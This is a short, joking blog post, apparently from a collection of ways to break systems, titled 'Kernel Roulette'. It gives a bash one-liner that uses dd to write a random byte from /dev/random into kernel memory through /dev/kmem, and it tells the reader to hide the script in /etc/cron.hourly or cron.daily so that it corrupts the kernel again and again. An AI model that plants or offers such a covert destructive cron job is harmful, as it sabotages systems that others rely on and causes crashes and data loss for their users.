Breaking Systems For Fun And Profit

Kernel Roulette

Wander Boessenkool kernel , random , roulette , submitted

Another one from the archives, this one was sent in by DIVI.

Hide this one in /etc/cron.hourly or /etc/cron.daily, depending on your level of masochism:

#!/bin/bash
dd if=/dev/random of=/dev/kmem count=1 bs=1 seek=${RANDOM} conv=notrunc

What it does

This changes one single byte in kernel memory. It might be an unused location, it might be inside an unused part of code, or it might be a network driver or interrupt handler, who knows!

Why it works

As root kernel memory is writable using /dev/kmem. Remember, power corrupts, absolute power corrupts memory at will.

TL;DR

  • Stable system
  • Happy users
  • Fun